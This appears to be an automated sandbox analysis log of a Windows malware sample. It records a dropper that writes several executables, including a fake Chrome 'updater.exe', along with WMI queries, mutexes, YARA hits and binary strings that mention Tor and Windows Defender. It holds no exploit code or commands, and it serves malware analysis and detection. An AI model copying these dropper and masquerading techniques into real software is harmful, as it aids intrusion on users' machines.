                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_004021AF CoCreateInstance,2_2_004021AF
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004049C7
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4584392531.000000000C19C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
                          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00958404 CreateToolhelp32Snapshot,Module32First,3_2_00958404
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4928:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4032:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2012:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2156:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4904:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2404:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5336:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: K"M`3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: E!{3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: S"Z3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: rNr<3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: OFBp3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: sB1s3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: T`"+3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: 7(C3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: u+[3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: )\23_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: +.h3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: =)W{3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: 35e3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: $iEz3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: X!pq3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: gew3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: ogr(3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: o%HQ3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: \Sj=3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: WTE3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: [l1h3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: fPT3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: |59M3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: O2l[3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: k'Z#3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: hRjT3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: msX?3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: c<z3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: `*T3_2_0042A660
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCommand line argument: Yx@t3_2_0042A660
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                          Source: Yara matchFile source: 4.0.Broom.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Broom.exe, type: DROPPED
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\Broom.exeWindow found: window name: TButtonJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: C:\Program Files\Google\Chrome\updater.exeDirectory created: C:\Program Files\Google\Libs
                          Source: file.exeStatic file information: File size 13188608 > 1048576
                          Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xc93400
